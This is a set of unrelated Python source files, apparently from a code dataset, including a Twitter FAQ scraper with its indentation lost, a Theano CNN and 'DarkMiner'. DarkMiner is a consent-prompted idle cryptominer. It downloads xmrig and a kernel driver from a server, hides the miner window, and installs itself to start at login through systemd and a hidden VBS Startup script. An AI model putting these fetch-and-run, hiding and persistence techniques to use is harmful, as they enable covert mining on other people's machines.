logger = loghelper.getLogger("default")
logger.info("Start App")
# --------------------------------------------------------------------------------
# FAQ URLs in different languages; currently supported: ES, EN
urls = {#'es': 'https://help.twitter.com/es',
'en': 'https://help.twitter.com/'
}
languages = { 'es':'spanish', 'en': 'english'}
# --------------------------------------------------------------------------------
# Timeout for requests
CONST_TIMEOUT = 10
# --------------------------------------------------------------------------------
# Delay between requests
CONST_REQUEST_TIME_DELAY = 0
# --------------------------------------------------------------------------------
# Main list of subsections
main_subsection_list = []
# --------------------------------------------------------------------------------
# URL dictionary
url_dictionary = {}
# --------------------------------------------------------------------------------
for language, url in urls.items():
    # Log record creation
logger.info("Create Language Subsection {0!r} with url {1!r}".format(language,url))
sec = SubSecction('FAQ language {0}'.format(language), url, '', -1)
    # Fetch the main help pages for the corresponding language
response = requests.get(url, timeout=CONST_TIMEOUT)
    # Create the tokenizer for the selected language
tokenizer = Tokenizer(logger,languages[language])
    # HTML content to parse
content = BeautifulSoup(response.content, "html.parser")
    # In this block we try to split the page's help content into different
    # sections. To do that we have to explore every place in the HTML page
    # where that content can be found, such as: hp01__content,
    # hp01__topic-list-item, ap04, twtr-component-space--md.
    # The generated JSON therefore has a title, an ID and content, so it is
    # better structured for later processing.
id = 0
for tweet in content.findAll('div', attrs={"class": "hp01__content"}):
title = tweet.p.text.strip()
logger.info("Create Subsection {0!r}".format(title))
mainSecction_item = SubSecction(title, url, tweet.p.text.strip(), id)
id = id + 1
pid = id
for text in tweet.findAll('li', attrs={"class", "hp01__topic-list-item"}):
sub_content_secction_title = text.a.text.strip()
logger.info("Create Subsection {0!r}".format(sub_content_secction_title))
if text.a.get('href') in url_dictionary:
pid = url_dictionary[text.a.get('href')]
continue
else:
url_dictionary[text.a.get('href')] = id
sub_content_secction = SubSecction(sub_content_secction_title,text.a.get('href'), '', pid)
sub_response = requests.get(text.a.get('href'), timeout=CONST_TIMEOUT)
sub_content = BeautifulSoup(sub_response.content, "html.parser")
for sub_text in sub_content.findAll('script', attrs={"type": "application/ld+json"}):
y = anyjson.deserialize(sub_text.text.strip().replace('@', ''))
if (y['type'] == 'CollectionPage'):
item_list = y['mainEntity']['itemListElement']
for item_text in item_list:
id = id +1
pid = id
if item_text['url'] in url_dictionary:
pid = url_dictionary[text.a.get('href')]
continue
else:
url_dictionary[item_text['url']] = id
time.sleep(CONST_REQUEST_TIME_DELAY)
page_response = requests.get(item_text['url'], timeout=CONST_TIMEOUT)
page_content = BeautifulSoup(page_response.content,"html.parser")
separator = ' '
buffer = ' '
data_html = page_content.findAll('div', attrs={"class": "ap04"})
data_html2 = page_content.findAll('div', attrs={"class": "twtr-component-space--md"})
if(len(data_html) >0):
for help_text in page_content.findAll('div', attrs={"class": "ap04"}):
data = separator.join(tokenizer.tokenize(help_text.text.strip().replace('@', '')))
if data not in buffer:
buffer = '{0} {1}'.format(buffer, data)
elif len(data_html2) > 0:
for help_text in data_html2:
data_text_2 = help_text.text.strip().replace('@', '')
if 'BreadcrumbList' not in data_text_2:
data = separator.join(tokenizer.tokenize(data_text_2))
if data not in buffer:
buffer = '{0} {1}'.format(buffer, data)
logger.info("Create Subsection {0!r} -> {1!r}".format(item_text['name'],item_text['url']))
item_subSection = SubSecction(item_text['name'],item_text['url'],buffer,pid)
sub_content_secction.addSubSecction(subSecction=item_subSection)
mainSecction_item.addSubSecction(subSecction = sub_content_secction)
sec.addSubSecction(subSecction=mainSecction_item)
main_subsection_list.append(sec)
# --------------------------------------------------------------------------------
# Save the Spanish data to a JSON file
with open('es_data.json', 'a') as the_file:
str_data = str(main_subsection_list[0]).replace("\\","")
the_file.write(str_data)
# --------------------------------------------------------------------------------
# Save the English data to a JSON file
with open('en_data.json', 'a') as the_file:
str_data = str(main_subsection_list[0]).replace("\\","")
the_file.write(str_data)
| 2.265625
| 2
|
pybuild/main.py
|
892768447/python3-android
| 1
|
12783914
|
<reponame>892768447/python3-android
import logging
from .package import import_package
built_packags: set = set()
logger = logging.getLogger(__name__)
def build_package(pkgname: str) -> None:
if pkgname in built_packags:
return
pkg = import_package(pkgname)
need_prepare = False
logger.info(f'Building {pkgname} {pkg.get_version()}')
if pkg.need_download():
for src in pkg.sources:
src.download()
# All signatures should be downloaded first so that sources can be verified
for src in pkg.sources:
src.verify()
src.extract()
for patch in getattr(pkg, 'patches', []):
patch.apply(pkg.source)
need_prepare = True
for dep in pkg.dependencies:
build_package(dep)
if need_prepare:
try:
pkg.prepare()
except NotImplementedError:
print('Skipping prepare step')
pkg.build()
built_packags.add(pkgname)
def main():
logging.basicConfig(level=logging.DEBUG)
build_package('python')
| 2.203125
| 2
|
tox_helpers/run_integration_tests.py
|
sivchand/smart_open
| 2,047
|
12783915
|
<reponame>sivchand/smart_open
"""Runs integration tests."""
import os
import subprocess
os.environ['PYTEST_ADDOPTS'] = "--reruns 3 --reruns-delay 1"
subprocess.check_call(
[
'pytest',
'integration-tests/test_207.py',
'integration-tests/test_http.py',
]
)
if os.environ.get('AWS_ACCESS_KEY_ID') and os.environ.get('AWS_SECRET_ACCESS_KEY'):
subprocess.check_call(['pytest', '-v', 'integration-tests/test_s3_ported.py'])
| 1.9375
| 2
|
players.py
|
TexasChainstoreManager/chessrisk
| 1
|
12783916
|
import global_vars as gv
import random
# TODO: importing ai modules programmatically using the imp module.
from ai import simpleton
from ai import learning_simpleton
ai_modules = {
'simpleton': simpleton.Simpleton,
'learning_simpleton': learning_simpleton.LearningSimpleton
}
chosen_ai_modules = []
class PlayersDict(dict):
""" A dict whose values are objects with a save() method
"""
def __init__(self, *args):
dict.__init__(self, args)
def save(self):
j = '{'
for name, value in self.iteritems():
j += '"%s": %s,' % (name, value.save())
j = j.rstrip(',') + '}'
return j
def load(self, data):
self.clear()
for key, value in data.iteritems():
if gv.DEBUG:
print data
self[key] = Player(value['colour'])
class Player(object):
def __init__(self, colour, ai_instance=None):
self.colour = colour
self.ai_instance = ai_instance
self.is_ai = bool(self.ai_instance)
def save(self):
if self.colour == None:
colour = 'null'
else:
colour = self.colour
j = '{'
j += '"colour": "%s"' % colour
j += '}'
return j
def load(self, data):
self.colour = data['colour']
def choose_number_of_players():
global chosen_ai_modules
gv.UI.clear_inv_choices()
gv.UI.set_inv_choice({
"Please enter a number":
lambda x: not x.isdigit()})
gv.UI.set_inv_choice({
"You must have >=0.":
lambda x: int(x) < 0})
gv.UI.set_inv_choice({
"6 players is the maximum (have you never played Risk?)":
lambda x: int(x) > 6})
gv.N_HUMAN_PLAYERS = int(gv.UI.user_input_check_choices(
"How many human players are there?", clear=True))
gv.UI.clear_inv_choices()
gv.UI.set_inv_choice({
"Only these modules are available: {}".format(list(ai_modules.keys())):
lambda x: x not in ai_modules and x not in ('p', 'play')})
while True:
player_module = gv.UI.user_input_check_choices(
"Adding computer players:\n"
" Type the name of a module in the 'ai' directory to add a player of that type.\n"
" Or type '(p)lay' to start playing.\n\n"
"Modules available: {}".format(list(ai_modules.keys())), clear=False)
if player_module.lower().strip() in ('p', 'play'):
break
chosen_ai_modules.append(ai_modules[player_module])
if chosen_ai_modules:
gv.AI_PLAYERS_ARE_PLAYING = True
def choose_colour(name):
gv.UI.clear_inv_choices()
gv.UI.set_inv_choice({
"Do not disobey me.":
lambda x: x not in gv.PLAYER_COLORS})
return gv.UI.user_input_check_choices(name + ", choose a mark from {0}".format(' '.join(gv.PLAYER_COLORS)))
def choose_player_name(iplayer):
return gv.UI.handle_user_input("Player " + str(iplayer+1) + ":\nWhat would you like to be called?",
cast_lower=False, clear=True)
def setup_players():
gv.PLAYERS = PlayersDict()
for iplayer in xrange(gv.N_HUMAN_PLAYERS):
name = choose_player_name(iplayer)
gv.PLAYERS[name] = Player(choose_colour(name))
for ai_class in chosen_ai_modules:
ai_instance = ai_class()
color = random.choice(gv.PLAYER_COLORS)
gv.PLAYERS[ai_instance.name(gv)] = Player(color, ai_instance=ai_instance)
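# --- Hedged usage note (added for illustration; not part of the original
# module). PlayersDict.save() builds a small JSON document by hand; a round
# trip could look like this (the name and colour are just examples):
#
#     import json
#     players = PlayersDict()
#     players['alice'] = Player('red')
#     data = json.loads(players.save())   # {'alice': {'colour': 'red'}}
#     players.load(data)                  # rebuilds the Player objects
#
# Note that load() expects already-parsed dict data, not a raw JSON string.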
| 2.84375
| 3
|
cnnclassifier.py
|
schurterb/kmeansconv
| 2
|
12783917
|
<reponame>schurterb/kmeansconv<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 17:34:12 2016
@author: user
2D convolutional classifier for mnist data set
unsupervised learning
"""
import os
from sh import mkdir
import configparser
import theano
from theano import tensor as T
from theano.tensor.nnet import conv2d
import numpy as np
theano.config.floatX = 'float32'
theano.config.optimizer = 'fast_compile'
theano.config.exception_verbosity = 'high'
class CNN2D(object):
def __init__(self, **kwargs):
self.name = kwargs.get('name', 'CNN2D')
self.rng = kwargs.get('rng', np.random.RandomState(42))
load_folder = kwargs.get('network_folder', None)
#Prepare the network weights
self.configData = "network.cfg"
self.network_folder = None
if load_folder is not None:
try:
self.__load_config(load_folder)
if not self.__load_weights(load_folder):
return None
self.network_folder = load_folder
except:
load_folder=None
if self.network_folder is None:
self.network_folder = self.name
mkdir('-p', self.name)
self.nConvLayers = kwargs.get('convolutional_layers', 1)
self.nConvFilters = kwargs.get('convolutional_filters', 20)
self.convFilterSize = kwargs.get('filter_size', 7)
self.nRegLayers = kwargs.get('regression_layers', 1)
self.regLayerSize = kwargs.get('layer_size', 50)
self.regLayers = ()
for i in range(self.nRegLayers):
self.regLayers += (self.regLayerSize ,)
self.nClasses = kwargs.get('number_classes',10)
self.regLayers += (self.nClasses ,)
self.activation = kwargs.get('activation', 'tanh')
self.imageShape = kwargs.get('image_size', (28, 28))
self.device = kwargs.get('device', 'cpu')
self.sample_size = self.nConvLayers*(self.convFilterSize -1) +1
self.__save_config(self.network_folder)
self.__define_network()
self.__init_weights()
#symbolic variable for import to network
self.X = T.tensor3('X')
#create symbolic representation for network
self.__create_model()
#Currently, cpu only
self.forward = theano.function(inputs=[self.X], outputs=self.out, allow_input_downcast=True)
""" Make predictions on some input x """
def run(self, x, **kwargs):
return self.forward(x)
""" Store weights and meta-data to folder """
def save(self, folder):
if not folder.endswith("/"):
folder += "/"
if not os.path.exists(folder+"weights"):
mkdir('-p', folder+"weights/conv")
mkdir('-p', folder+"weights/reg")
for i in range(0, self.nConvLayers):
self.cw[i].get_value().tofile(folder+"weights/conv/layer_"+str(i)+"_weights.csv", sep=',')
self.cb[i].get_value().tofile(folder+"weights/conv/layer_"+str(i)+"_bias.csv", sep=',')
for i in range(0, self.nRegLayers):
self.rw[i].get_value().tofile(folder+"weights/reg/layer_"+str(i)+"_weights.csv", sep=',')
self.rb[i].get_value().tofile(folder+"weights/reg/layer_"+str(i)+"_bias.csv", sep=',')
""" Generate Definition of Network Structure """
def __define_network(self):
## Define convolutional network component
self.postConvImageShape = np.ndarray(2)
self.postConvImageShape[0] = self.imageShape[0] - self.nConvLayers*(self.convFilterSize -1)
self.postConvImageShape[1] = self.imageShape[1] - self.nConvLayers*(self.convFilterSize -1)
self.convnet_shape = np.ndarray([self.nConvLayers, 4])
self.convnet_shape[0,:] = [self.nConvFilters, 1, self.convFilterSize, self.convFilterSize]
#self.convnet_shape[0,:] = [1, self.nConvFilters, self.convFilterSize, self.convFilterSize]
for i in range(1, self.nConvLayers):
self.convnet_shape[i,:] = [self.nConvFilters, self.nConvFilters, self.convFilterSize, self.convFilterSize]
## Define regression network component
if self.regLayers is not None:
self.regnet_shape = np.ndarray([len(self.regLayers), 2])
self.regnet_shape[0, :] = \
[self.nConvFilters*self.postConvImageShape[0]*self.postConvImageShape[1], self.regLayers[0]]
for i in range(1, len(self.regLayers)):
self.regnet_shape[i,:] = [self.regLayers[i-1], self.regLayers[i]]
else:
self.regnet_shape = None
""" Randomly Initialize Network Weights """
def __init_weights(self):
self.cw = () #Convolution weights
self.cb = () #Convolution biases
for layer in range(0, self.nConvLayers):
            #Initialize within the optimum range for tanh activation
#Initialize convoluional layer weights
fan_in = self.convnet_shape[layer, 1] * (self.sample_size**3)
fan_out = self.convnet_shape[layer, 0] * (self.convFilterSize**3)
bound = np.sqrt(6.0/(fan_in+fan_out))
self.cw += (theano.shared(np.asarray(self.rng.uniform(low= -bound,
high= bound,
size = self.convnet_shape[layer, :]),
dtype=theano.config.floatX), name='cw-'+str(layer)) ,)
self.cb += (theano.shared(np.asarray(np.ones(self.convnet_shape[layer, 0]),
dtype=theano.config.floatX), name='cb-'+str(layer)) ,)
self.rw = () #Regression weights
self.rb = () #Regression biases
for layer in range(0, len(self.regLayers)):
#Initialize regression layer weights
bound = 0.75
self.rw += (theano.shared(np.asarray(self.rng.uniform(low= -bound,
high= bound,
size = self.regnet_shape[layer, :]),
dtype=theano.config.floatX), name='rw-'+str(layer)) ,)
self.rb += (theano.shared(np.asarray(np.ones(self.regnet_shape[layer, 1]),
dtype=theano.config.floatX), name='rb-'+str(layer)) ,)
""" Load network meta-data from folder """
def __save_config(self, folder):
try:
if not folder.endswith("/"):
folder += "/"
file = folder+self.configData
config = configparser.ConfigParser()
if os.path.isfile(file):
config.read(file)
if not config.has_section('General'):
config.add_section('General')
config.set('General', 'device', str(self.device))
if not config.has_section('Network'):
config.add_section('Network')
config.set('Network', 'network_folder', folder)
config.set('Network', 'name', str(self.name))
config.set('Network', 'image_width', str(self.imageShape[0]))
config.set('Network', 'image_height', str(self.imageShape[1]))
            config.set('Network', 'convolutional_layers', str(self.nConvLayers))
            config.set('Network', 'convolutional_filters', str(self.nConvFilters))
config.set('Network', 'filter_size', str(self.convFilterSize))
config.set('Network', 'regression_layers', str(self.nRegLayers))
config.set('Network', 'layer_size', str(self.regLayerSize))
config.set('Network', 'number_classes', str(self.nClasses))
config.set('Network', 'activation', str(self.activation))
with open(file, 'w') as f:
config.write(f)
return True
except Exception as e:
print("Unable to save network configuration data: ",e)
return False
""" Load network meta-data from folder """
def __load_config(self, folder):
if not folder.endswith("/"):
folder += "/"
file = folder+self.configData
if os.path.isfile(file):
            config = configparser.ConfigParser()
            config.read(file)
self.name=config.get('Network', 'name')
self.imageShape=( config.getint('Network', 'image_width'), config.getint('Network', 'image_height') )
self.nConvLayers=config.getint('Network', 'convolutional_layers')
self.nConvFilters=config.getint('Network', 'convolutional_filters')
self.convFilterSize=config.getint('Network', 'filter_size')
self.nRegLayers=config.getint('Network', 'regression_layers')
self.regLayerSize=config.getint('Network', 'layer_size')
self.nClasses=config.getint('Network', 'number_classes')
self.regLayers = ()
for i in range(self.nRegLayers):
self.regLayers += (self.regLayerSize ,)
self.regLayers += (self.nClasses ,)
self.activation=config.get('Network', 'activation')
self.sample_size = self.nConvLayers*(self.convFilterSize -1) +1
return True
else:
print("Unable to load network configuration data.")
return False
""" Load weights from folder """
def __load_weights(self, folder):
if not folder.endswith("/"):
folder += "/"
if not os.path.exists(folder+"weights"):
return False
try:
self.cw = () #Convolution weights
self.cb = () #Convolution biases
for layer in range(0, self.nConvLayers):
self.cw += (theano.shared(
np.genfromtxt(folder+"weights/conv/layer_"+str(layer)+"_weights.csv",
delimiter=',')) ,)
self.cb += (theano.shared(
np.genfromtxt(folder+"weights/conv/layer_"+str(layer)+"_bias.csv",
delimiter=',')) ,)
self.rw = () #Regression weights
self.rb = () #Regression biases
for layer in range(0, len(self.regLayers)):
self.rw += (theano.shared(
np.genfromtxt(folder+"weights/reg/layer_"+str(layer)+"_weights.csv",
delimiter=',')) ,)
self.rb += (theano.shared(
np.genfromtxt(folder+"weights/reg/layer_"+str(layer)+"_bias.csv",
delimiter=',')) ,)
            return True
        except:
            return False
""" Create Symbolic Theano definition for network """
def __create_model(self):
#Prepare input tensor
Xin = self.X.dimshuffle(0, 'x', 1, 2)
#Set up convolutional layers
out = T.tanh(conv2d(Xin, self.cw[0], border_mode='valid') + self.cb[0].dimshuffle('x',0,'x','x'))
for layer in range(1, self.nConvLayers):
out = T.tanh(conv2d(out, self.cw[layer], border_mode='valid') + self.cb[layer].dimshuffle('x',0,'x','x'))
#Set up regression layers
out = T.tanh(T.dot(out.flatten(2), self.rw[0]) + self.rb[0])
for layer in range(1, len(self.regLayers)-1):
out = T.tanh(T.dot(out, self.rw[layer]) + self.rb[layer])
#Set up output layer
out = T.nnet.sigmoid(T.dot(out, self.rw[-1]) + self.rb[-1])
self.out = out
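
# Minimal usage sketch for CNN2D: builds a tiny network for MNIST-sized 28x28
# images and pushes a random batch through it. The batch is invented purely for
# illustration, and running this assumes a Theano/NumPy environment contemporary
# with this code; real data loading and any training loop are out of scope.
if __name__ == '__main__':
    demo_net = CNN2D(name='cnn2d_demo', convolutional_layers=1,
                     convolutional_filters=8, filter_size=7,
                     regression_layers=1, layer_size=50,
                     number_classes=10, image_size=(28, 28))
    demo_batch = np.random.rand(4, 28, 28).astype('float32')  # 4 fake images
    demo_probs = demo_net.run(demo_batch)                      # shape (4, 10)
    print(demo_probs.argmax(axis=1))                           # predicted classes
    demo_net.save(demo_net.network_folder)                     # persist weights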
| 2.5
| 2
|
python/main.py
|
Luke-Larsen/DarkMiner
| 3
|
12783918
|
# Version 1
#TODO clean up these imports now that we are doing more modular processing
import sys, signal,platform,os,time,subprocess,configparser,multiprocessing,easygui,requests
from Communicate import *
from functions import LinuxIdleTime,WindowsIdleTime
#Script Version
ScriptVersion = '1.0'
#SHA256 of your downtime programs
SHA256ProgramMiner = '7db002483369077051d179a80105a816c45951c24fe65023d58bc05609c49f65'
SHA256ProgramSheepit = 'e4674e9e1be5bfd843c10dd9e4c42767608e3777760c83f9ccdfad5d9cffe59c'
#Github Repo link
GithubLink = 'https://api.github.com/repos/Luke-Larsen/DarkMiner'
#Development Mode ( Stops it from hiding in the background)
DevMode = 0 #0 off. Anything else means on
#functions
def errorOccurred(errorCode):
easygui.msgbox(errorCode,"ERROR OCCURRED")
sys.exit("ERROR")
def UpdateTotalMiningTime(value):
config.read('config.ini')
TotalTimeMining = config['value']['TotalTimeMining']
NewTotalTimeMining = int(TotalTimeMining) + int(value)
config['value'] = {
'TotalTimeMining' : NewTotalTimeMining
}
with open(os.path.expanduser('~') +'/.darkminer/config.ini', 'w+') as configfile:
config.write(configfile)
def UpdateScript():
print("Ran Update")
def Is64Windows():
return 'PROGRAMFILES(X86)' in os.environ
def GetProgramFiles32():
if Is64Windows():
return False
else:
return True
from functions import DownloadData
def Miner():
#TODO: Check if the last idle time is less then 1 minute and if it is increase the idle time required in the config.
#TODO: Start logging away time so that we can build a simple computer model of downtime to prevent false positives
if Communication == 2:
downTimeSignal(BaseSite,1)
if osSystem == 'win32':
if not os32Bit:
if os.path.exists(WinPathDownloads + 'xmrig.exe'):
print('exists no need to download')
else:
DownloadData(BaseSite + 'xmrig.exe', WinPathDownloads + 'xmrig.exe')
if os.path.exists(WinPathDownloads + 'WinRing0x64.sys'):
print('exists no need to download')
else:
DownloadData(BaseSite + 'WinRing64.sys', WinPathDownloads + 'WinRing0x64.sys')
if os.path.exists(WinPathDownloads + 'config.json'):
print('exists no need to download')
else:
DownloadData(BaseSite + 'config.json', WinPathDownloads + 'config.json')
import win32gui
import win32api
proc = subprocess.Popen([WinPathDownloads + "xmrig.exe"])
time.sleep(3)
def enumWindowFunc(hwnd, windowList):
""" win32gui.EnumWindows() callback """
text = win32gui.GetWindowText(hwnd)
className = win32gui.GetClassName(hwnd)
if text.find("xmrig") >= 0:
windowList.append((hwnd, text, className))
myWindows = []
win32gui.EnumWindows(enumWindowFunc, myWindows)
for hwnd, text, className in myWindows:
win32gui.ShowWindow(hwnd, False)
print('Running Miner waiting for action from user')
TotalSleepTime = 0
LastActivity = win32api.GetLastInputInfo()
while True:
if LastActivity != win32api.GetLastInputInfo():
proc.terminate() # Terminates Child Process
UpdateTotalMiningTime(TotalSleepTime)
if Communication == 2:
downTimeSignal(BaseSite,0)
break
elif LastActivity == win32api.GetLastInputInfo():
time.sleep(3)
TotalSleepTime += 3
main()
elif osSystem == 'Linux':
if is_64bits:
if(DownTimeActivity == "Miner"):
from Miner import LinuxMine64
LinuxMine64(LinuxPathDownloads,SHA256ProgramMiner,SHA256Program,waitTime,Communication,BaseSite)
elif(DownTimeActivity == "Sheepit"):
from sheepit import LinuxRender64
LinuxRender64(LinuxPathDownloads,waitTime,Communication,BaseSite)
main()
def Install():
if easygui.ynbox('Proceed with the install of DarkMiner. If you do not know what this is press NO', 'Title', ('Yes', 'No')):
if easygui.ynbox('Would you like this to reboot on each startup of the computer', 'Title', ('Yes', 'No')):
rebootStart = 1
else:
rebootStart = 0
#Grab data for config
msg = "Enter your configuration values"
title = "Enter Config data"
#0 least communication. 2 is the most communication
fieldNames = ["Webdomain", "Communication mode(0-2)"]
fieldValues = easygui.multenterbox(msg, title, fieldNames)
if fieldValues is None:
sys.exit(0)
# make sure that none of the fields were left blank
while 1:
errmsg = ""
for i, name in enumerate(fieldNames):
if fieldValues[i].strip() == "":
errmsg += "{} is a required field.\n\n".format(name)
if errmsg == "":
break # no problems found
fieldValues = easygui.multenterbox(errmsg, title, fieldNames, fieldValues)
if fieldValues is None:
break
#TODO check to make sure the website url is valid and will work
        #writing to config
config['settings'] = {
"Agree" : 1,
"Communication" : fieldValues[1], #0 no communication; 1 basic comunication; 2 verbose communication
"DownTimeActivity" : "Miner",
"rebootStart" : rebootStart,
"waitTime" : '120',
"WinPathDownloads" : 'C:/Users/' + os.getlogin() + '/Downloads/',
"LinuxPathDownloads" : os.path.expanduser('~') +'/.darkminer/',
"UpdateFrom": 0 #0 github, 1 CNC
}
config['server'] = {
"Version" : ScriptVersion,
'BaseSite' : fieldValues[0]
}
config['value'] = {
'TotalTimeMining' : 0,
'SHA256Program': SHA256ProgramMiner #Checking the sha256 of the downloaded program to make sure that its good for now you will need to change it manually
}
with open('config.ini', 'w') as configfile:
config.write(configfile)
TotalTimeMining = 0
if(rebootStart):
#Set path to bin and create a folder in it
UserPath = os.path.expanduser('~') +'/.darkminer/'
FileName = sys.argv[0]
if not os.path.isdir(UserPath):
if osSystem == 'win32':
os.makedirs(UserPath)
elif osSystem == 'Linux':
os.mkdir(UserPath,0o755)
#code for setting up the boot
if osSystem == 'Linux':
#switching to using systemd
#check if systemd user path is set up
if not os.path.isdir(os.path.expanduser('~')+'/.config/systemd/user'):
os.mkdir(os.path.expanduser('~')+'/.config/systemd',0o755)
os.mkdir(os.path.expanduser('~')+'/.config/systemd/user',0o755)
#Add our service
filehandle = open(os.path.expanduser('~')+'/.config/systemd/user/darkminer.service', 'w')
if DevMode == 0:
filehandle.write('[Unit]\
\nDescription=Dark Miner Service\
\nPartOf=graphical-session.target\
\n[Service]\
\nExecStart=/usr/bin/python3.8 '+os.path.expanduser('~')+'/.darkminer/main.py --display=:0.0\
\nRestart=always\
\n[Install]\
\nWantedBy=xsession.target\
')
else:
filehandle.write('[Unit]\
\nDescription=Dark Miner Service\
\nPartOf=graphical-session.target\
\n[Service]\
\nExecStart=/usr/bin/python3.8 '+os.path.expanduser('~')+'/.darkminer/main.py\
\nRestart=always\
\n[Install]\
\nWantedBy=xsession.target\
')
filehandle.close()
#Setting up startup on user login; check graphical environment is ready
filehandle = open(os.path.expanduser('~')+'/.config/systemd/user/xsession.target', 'w')
filehandle.write('[Unit]\
\nDescription=Users Xsession running\
\nBindsTo=graphical-session.target\
')
filehandle.close()
#Start xsession.service on user login
filehandle = open(os.path.expanduser('~')+'/.xsessionrc', 'w')
filehandle.write('systemctl --user import-environment PATH DBUS_SESSION_BUS_ADDRESS\
\nsystemctl --no-block --user start xsession.target\
')
filehandle.close()
result = subprocess.run(['systemctl', '--user', 'enable','darkminer'], stdout=subprocess.PIPE)
print(result)
elif osSystem == 'win32':
                #I may come back to this later so that I can use the Task Scheduler for updating and restarting on crash. It might also make it
                #easier to install because Windows probably flags this method as a virus.
#Keep everything clean and in folders
os.makedirs(os.path.expanduser('~')+"/AppData/Roaming/DarkMiner/")
bat = open(os.path.expanduser('~')+"/AppData/Roaming/DarkMiner/"+"DarkMiner.bat", "a")
bat.write("py "+UserPath+"main.py")
bat.close()
#now create a vbs script so you don't have to see the damn terminal all the time
vbs = open(os.path.expanduser('~')+"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"+"DarkMiner.vbs", "a")
vbs.write('Set WinScriptHost = CreateObject("WScript.Shell") \n WinScriptHost.Run Chr(34) & "'+os.path.expanduser('~')+"/AppData/Roaming/DarkMiner/DarkMiner.bat"+'" & Chr(34), 0 \n Set WinScriptHost = Nothing')
vbs.close()
#Copy files to working directory
from shutil import copyfile
copyfile("main.py", UserPath+"main.py")
copyfile("functions.py", UserPath+"functions.py")
copyfile("Communicate.py", UserPath+"Communicate.py")
copyfile("Miner.py", UserPath+"Miner.py")
copyfile("sheepit.py", UserPath+"sheepit.py")
copyfile("config.ini", UserPath+"config.ini")
#os.remove("config.ini")
#Start file from working directory
easygui.msgbox('Installed DarkMiner in '+UserPath+ " starting program", 'All done')
if osSystem == 'Linux':
if DevMode == 0:
os.system("nohup python3 "+UserPath+"main.py"+" &")
else:
os.system("python3 "+UserPath+"main.py")
elif osSystem == 'win32':
os.system("py "+UserPath+"main.py")
def main():
if osSystem == 'win32':
WindowsIdleTime()
elif osSystem == 'Linux':
LinuxIdleTime(waitTime)
Miner()
#Handle a program shutdown
def handler(signum = None, frame = None):
print('\n')
if DownTimeActivity == "Miner":
from Miner import Kill
elif DownTimeActivity == "Sheepit":
from sheepit import Kill
Kill()
print('Program Closed')
sys.exit(0)
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
signal.signal(sig, handler)
#Dependency check
try:
result = subprocess.run(['xprintidle'], stdout=subprocess.PIPE)
except:
print("xprintidle is not installed")
exit()
#Read from Config file if exists
config = configparser.ConfigParser()
if os.path.isfile(os.path.expanduser('~') +'/.darkminer/'+"config.ini"):
config.read(os.path.expanduser('~') +'/.darkminer/'+"config.ini")
#Settings
Agree = int(config['settings']['Agree'])
Communication = int(config['settings']['communication'])
DownTimeActivity = config['settings']['DownTimeActivity'] #What you want to run on downtime
rebootStart = int(config['settings']['rebootStart'])
waitTime = int(config['settings']['waitTime'])
WinPathDownloads = config['settings']['WinPathDownloads']
LinuxPathDownloads = config['settings']['LinuxPathDownloads']
try:
UpdateFrom = config['settings']['UpdateFrom']
except KeyError as e:
#No value set because this could be an update to a running system
UpdateFrom = 0
#Server
BaseSite = config['server']['BaseSite']
Version = config['server']['Version']
#check if updated script
if float(Version) < float(ScriptVersion):
print('Script has been updated')
Version = ScriptVersion
config['server']= {
'BaseSite': BaseSite,
'Version' : ScriptVersion
}
with open('config.ini', 'w') as configfile:
config.write(configfile)
#Values
TotalTimeMining = config['value']['totaltimemining']
try:
SHA256Program = config['value']['SHA256Program']
except KeyError as e:
SHA256Program = SHA256ProgramMiner
else:
Agree = 0
#Start of program determines what operating system to go with
if sys.platform.startswith('win32'):
osSystem = 'win32'
os32Bit = GetProgramFiles32()
#Check if User has agreed to mine
if(Agree):
#Check version of the program to make sure we are running the latest and greatest
if Communication >= 1:
checkVersion(ScriptVersion,BaseSite,osSystem,GithubLink)
main()
else:
Install()
elif sys.platform.startswith('linux'):
osSystem = 'Linux'
is_64bits = sys.maxsize > 2 ** 32
if(Agree):
if Communication >= 1:
checkVersion(ScriptVersion,BaseSite,osSystem,GithubLink)
main()
else:
Install()
| 2.125
| 2
|
templates/app/kvm/actions.py
|
Jumpscale/ays_jumpscale8
| 0
|
12783919
|
def install(job):
cuisine = job.service.executor.cuisine
# install kvm
cuisine.systemservices.kvm.install()
# start libvirt-bin
job.service.executeActionJob('start', inprocess=True)
job.service.model.actions['uninstall'].state = 'new'
job.service.saveAll()
def start(job):
cuisine = job.service.executor.cuisine
services_to_start = ['libvirt-bin', 'virtlogd']
for service in services_to_start:
if not cuisine.processmanager.exists(service):
            raise j.exceptions.RuntimeError("{} service doesn't exist; \
it should have been created during installation of this service".format(service))
cuisine.processmanager.start(service)
job.service.model.actions['stop'].state = 'new'
job.service.saveAll()
def stop(job):
cuisine = job.service.executor.cuisine
services_to_start = ['libvirt-bin', 'virtlogd']
for service in services_to_start:
if not cuisine.processmanager.exists(service):
            raise j.exceptions.RuntimeError("{} service doesn't exist; \
it should have been created during installation of this service".format(service))
cuisine.processmanager.stop(service)
job.service.model.actions['start'].state = 'new'
job.service.saveAll()
def uninstall(job):
cuisine = job.service.executor.cuisine
cuisine.systemservices.kvm.uninstall()
job.service.model.actions['install'].state = 'new'
job.service.saveAll()
| 2.09375
| 2
|
flappybird.py
|
hxg10636/flappygame
| 0
|
12783920
|
import pygame
import sys
#define bird class
class Bird(object):
def __init__(self):
self.birdRect = pygame.Rect(65,50,50,50)
self.birdStatus = [pygame.image.load("flappybirdassets/assets/1.png"),
pygame.image.load("flappybirdassets/assets/2.png"),
pygame.image.load("flappybirdassets/assets/dead.png")]
self.status = 0
self.birdX = 120
self.birdY = 350
self.jump = False
self.jumpSpeed = 10
self.gravity = 5
self.dead = False
def birdUpdate(self):
#movement
if self.jump:
self.jumpSpeed -= 1
self.birdY -= self.jumpSpeed
else:
self.gravity += 0.2
self.birdY += self.gravity
self.birdRect[1] = self.birdY
def createMap():
screen.blit(background,(0,0))
#display pine
screen.blit(Pipeline.pineUp,(Pipeline.wallx, -300))
    screen.blit(Pipeline.pineDown,(Pipeline.wallx, 500))
Pipeline.PipelineUpdate()
#display bird
if Bird.dead :
Bird.status = 2
elif Bird.jump :
Bird.status = 1
screen.blit(Bird.birdStatus[Bird.status], (Bird.birdX,Bird.birdY))
Bird.birdUpdate()
screen.blit(font.render('Score:'+ str(score),1,(255,255,255)),(100,50))
pygame.display.update()
#define pipeline class
class Pipeline(object):
def __init__(self):
self.wallx = 400
